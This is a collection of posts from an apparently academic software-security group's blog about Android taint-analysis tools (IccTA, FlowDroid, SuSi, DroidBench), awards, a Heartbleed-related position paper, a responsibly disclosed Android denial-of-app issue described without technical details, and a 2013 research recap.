IccTA vs. DidFail: Inter-Component, Inter-Application Data Flow Analysis in Android Applications

We are happy to announce IccTA, a new tool for tracking data flows between Android components and even between Android applications. IccTA is a joined work together with Li Li, Alexandre Bartel, Jacques Klein, Yves Le Traon from the University of Luxembourg, Damien Octeau and Patrick McDaniel from the Pennsylvania State University, Steven Arzt, Siegfried Rasthofer and Eric Bodden from EC SPRIDE. IccTA is a tool performing static taint analysis for one or multiple Android applications. It leverages Epicc to connect Android components and FlowDroid to model the life-cycles of components and perform the taint analysis.

The taint analysis is performed intra- and inter-components, which improves the precision of the analysis. IccTA outperforms all other available tools (FlowDroid and AppScan) by reaching a precision of 95.0% and a recall of 82.6% on DroidBench.
When analyzing multiple applications, IccTA first merges them into one then performs the analysis.

Almost exactly the same moment, there came up an additional tool call DidFail from the Carnegie Mellon University, which is a similar approach to IccTA.
IccTA and DidFail both rely on Epicc and FlowDroid to find data leaks between components of Android applications. They can both detect intra- and inter-component leaks within a single application or between multiple applications. Even though they leverage the same tools to compute links between components and perform data-flow analysis, the implementations differ in term of precision.

In the following we would like to do a rough comparison of both tools:
Continue reading

Sieben Punkte für mehr Softwaresicherheit

Die aktuelle Heartbleed-Schwachstelle zeigt, wie wichtig es ist, die Sicherheit von Software zu verbessern. Konkrete Handlungsempfehlungen dazu diskutierten IT-Experten im Eberbacher Gespräch zu Software Security. Neben der Entwicklung besserer Testwerkzeuge fordern die Teilnehmer, die Sicherheit von Software bei öffentlichen Ausschreibungen stärker zu berücksichtigen sowie eine Diskussion der Haftungsfragen. Das Fraunhofer-Institut für Sichere Informationstechnologie SIT hat die Ergebnisse jetzt in einem Bericht veröffentlicht, der die wichtigsten Herausforderungen und passende Lösungsansätze beschreibt. Hier lässt sich das Positionspapier kostenlos herunterladen.

Software ist heute so komplex, dass Menschen selbst schwerwiegende Fehler trotz intensiver Prüfung nicht erkennen können. So bemerkte auch der Prüfer im Heartbleed-Fall den Fehler nicht. Dabei handelte es sich um Open-Source-Software, deren Programmcode sogar öffentlich einsehbar und nachprüfbar ist. Wie bei vielen Open-Source-Projekten nutzten Unternehmen den kostenlosen Code und sorgten so unabsichtlich für eine Verbreitung des Fehlers. „Das Beispiel zeigt, wie wichtig es ist, die Sicherheitsqualität von Programmcode vor dem Einsatz besser zu prüfen, und wie gefährlich die Nutzung von fremdem Code ist“, sagt Prof. Michael Waidner, Leiter des Fraunhofer SIT und Direktor des European Center for Security and Privacy by Design (EC SPRIDE). „Auch wenn noch nicht klar ist, welche Schäden durch die Schwachstelle entstanden sind, zeigt das Beispiel doch erneut, dass es wesentlich teurer ist, Softwarefehler nachträglich zu beheben, als sie in der Entwicklungsphase zu beseitigen.“

Um die Entwicklung sicherer Software zu fördern, erarbeiteten die Teilnehmer des Eberbacher Gesprächs sieben konkrete Empfehlungen: Dazu zählt neben der Beantwortung der Haftungsfrage die Entwicklung von flexiblen Sicherheitsprozessen, die sich auch für kleine und mittlere Softwarehersteller eignen. Neben einer verbesserten Ausbildung von Programmierern sollten auch die Vergaberichtlinien für Behörden so geändert werden, dass Mindestanforderungen hinsichtlich der IT-Sicherheit erfüllt werden. Um Unternehmen Anreize zu geben, die Sicherheit eingesetzter Software zu erhöhen, müssen Manager die Kostenvorteile von sicherer Software berechnen können, etwa mit Hilfe von neuen quantitativen Modellen. Darüber hinaus braucht es nach Meinung der Teilnehmer auch neue Zertifizierungsmethoden, die dem rasanten Tempo der Softwareentwicklung entsprechen, sowie neue Tools zur Schwachstellen-Aanalyse. „Gerade im Bereich der automatisierten Testwerkzeuge ist die deutsche Forschung besonders stark“, sagt Michael Waidner. „Neue Methoden erlauben es zum Beispiel, Fehler im Programmcode schneller und besser zu finden. Diese Ansätze gilt es jetzt, in Produkte zu verwandeln.“ Auf lange Sicht könnte sich auch eine Haftungsklärung positiv auf IT-Sicherheit und Datenschutz auswirken. (Oliver Küch, Fraunhofer SIT)

FlowDroid receives Artifact Evaluation Award

aec-badge-pldiOur taint-analysis framework FlowDroid was awarded the Artifact Evaluation Award at PLDI 2014. This year, out of 20 submitted artifacts, only 12 were found to meet or exceed the expectations and awarded accordingly. For FlowDroid, apparently the expectations of all three reviewers were exceeded. Thanks a lot to Christian Fritz for the initial implementation and to Steven Arzt for making this a nice and round distribution!

Are you using our tools? Please let us know!

Over the past few years, we have developed and open-sourced a whole range of program-analysis tools surrounding the Soot framework. Are you using Soot or any related tools?

Then please let us know by briefly filling out this form. It will not even take a minute!

This will help us when trying to acquire money with funding agencies and will help you help us keep up the level of support that you have provided so far.

Many thanks in advance!

DFG awards Eric Bodden the Heinz Maier-Leibnitz Price

The Deutsche Forschungsgemeinschaft (DFG) has awarded Eric Bodden the Heinz Maier-Leibnitz Price 2014. The Heinz Maier-Leibnitz Prize, named after the physicist and former president of the DFG, is a distinction for young researchers and provides further incentive for excellent achievements in their research work. Every year, up to 10 researchers in Germany are awarded with this price.

More information is available here in German

Google Confirms Denial-of-“App” Attack – Likely All Android Versions Affected

Together with their colleague Stephan Huber from Fraunhofer SIT, Steven Arzt and Siegfried Rasthofer from the SSE group discovered a security issue present in all current versions of Android. As Google now confirmed, the attack vector allows to forbid the future installation of arbitrary Android apps at the choice of the attacker. For instance, it can be used to forbid the installation of the facebook app for basically the entire lifetime of the mobile device until a factory reset has been performed or the issue is fixed manually which, however, requires root access to the device and some expertise in the Android OS. Update: The attack itself requires no root access.

We tested the attack on Android Version 4.x and 2.3.6. It is likely that this attack affects ALL Android versions, though. We wish to note, though, that this vulnerability was discovered under lab conditions, and that there is currently no indication that the vulnerability is exploited in the wild.

We are currently in contact with the Android security team to fix this problem. A detailed explanation of the attack will be published after a fix is available.

A recap on our research progress in 2013

2013 was an exciting year for me. It was the first full year I had with my new set of PhD students who I had hired through EC SPRIDE and through my Emmy Noether Research Group RUNSECURE. Also, 2013 was the year in which I started a cooperative professorship with Fraunhofer SIT – an exciting new challenge with the opportunity to bring academic research into industry. Last but not least it is the first year in which we actually managed to place publications at top security venues such as USENIX Security and NDSS. But let me start from the beginning.

The year started great with our paper on Join Point Interfaces getting accepted into TOSEM. This paper (for now) marks the final word on this research topic, which I had been working on with Eric Tanter and Milton Inostroza from the University of Chile for more than two years.

Just a few days later, we go the notification that our paper SPLLIFT: statically analyzing software product lines in minutes instead of years got accepted into PLDI. This is join work with Társis Tolêdo, Márcio Ribeiro, Claus Brabrand, Paulo Borba and Mira Mezini, which I am extremely proud of. Not only could we show in this paper that one can really speed up the execution of IFDS-based static analyses for product lines by several orders of magnitudes in practice, but after further investigation it even seems that our approach even lowers the theoretical complexity of the analysis problem from exponential in the number of features to linear. Expect to see a follow-up implementation on this topic.

In March we then received our Google Faculty Research Award, together with the group of Patrick McDaniel (Penn State) and Yves le Traon (University of Luxembourg). The award will allow us to build a map of how Android applications communicate with one another. The project has already lead to some much-cited publications. Our USENIX paper is on a static-analysis tool called EPICC, which is able to resolve intend-based inter-component communication in Android in most cases. In other words, the tool will tell you which app(s) a given intent-call site in a given app might call. FlowDroid has gotten at least just as much attention. FlowDroid is our static taint-analysis tool for Android. It seems to be the most precise and efficient Android taint-analysis tool out there, and most importantly it is the only one that is actually available as open source. We open sourced FlowDroid after having to learn the hard way that no other research tools were actually available. Since making FlowDroid available online it has been used and extended by multiple research groups. The FlowDroid paper, unfortunately, is still waiting to be published. Apparently, PCs at security conferences prefer papers with weak tools but big data over papers with sophisticated tools and a careful evaluation…

Another work we did manage to place at a security conference, though, namely our work on SuSi, our new machine-learning approach for inferring sources and sinks for Android taint analyses, a project headed by my PhD students Siegfried Rasthofer and Steven Arzt. This approach addresses the fundamental problem that no matter which taint analysis you use, it is going to be only as effective as your source and sink specifications. As we found, for all existing taint analyses these specifications are largely incomplete, and thus all those tools can be bypassed with ease. SuSi determines and even categorizes relevant sources and sinks with 95% accuracy, which solves the problem to a large extend. In practice we use SuSi in combination with FlowDroid. And just as FlowDroid also SuSi is open source.

Another project that got a lot of attention is DroidBench, our benchmark suite for testing the effectiveness of taint analyses for Android applications. DroidBench is open source, and as we hoped people have started to extend it and to pick it up for testing their security analysis tools.

Another recent and still unpublished work by my PhD student Andreas Follner is ROPocop, our new approach to defending against buffer-overflow attacks based on return-oriented programming. The approach word on X86 Windows binaries, through dynamic binary instrumentation. ROPocop applies a well tuned heuristic to detect ROP attacks with great accuracy (and no false alarms in our tests).

Also, Kevin Falzon presented a paper on Distributed Finite-State Runtime Monitoring with Aggregated Events at this year’s RV conference. Hi work is quite exciting in scenarios where one tries to implement distributive runtime monitoring with high loads. Kevin’s work evaluates to what extend one may aggregate events before submitting them to a centralized monitor such that one can speed up the overall monitoring process.

Steven Arzt further developed Reviser, an approach for automatically incrementalizing IFDS/IDE-based static analyses. As we could show, using incremental evaluation of program updates, one can often save about 80% of re-computation time. This work is currently under submission.

Last but not least, our Future-Security paper on Reducing human factors in software security architectures investigates several software security architectures including Java, .NET, JavaScript, etc. and to what extent they are prone to human error. This is join work with Ben Hermann, Johannes Lerch and Mira Mezini. The four of us are also currently working on a static analysis to detect security vulnerabilities in the Java Runtime Library. On this topic we just got awarded an Oracle Collaborative Research Grant. Thanks a lot to Michael Haupt, Cristina Cifuentes and Andrew Gross for supporting this initiative!

So much about 2013, but what’s to be expected from 2014? Well, in this summer I won an Attract Grant to establish a new research group at Fraunhofer SIT, so my first task will be to staff this group with some highly skilled people – not an easy undertaking in today’s job market. The goal of this group will be to make static analysis really work in practice, and we will go through all it takes to make this happen. We have already been targeting this goal for about a year now, and it has already yielded some very exciting research problems. So stay tuned for more. Until then I wish you all some wonderful Christmas Holidays and a happy and successful 2014!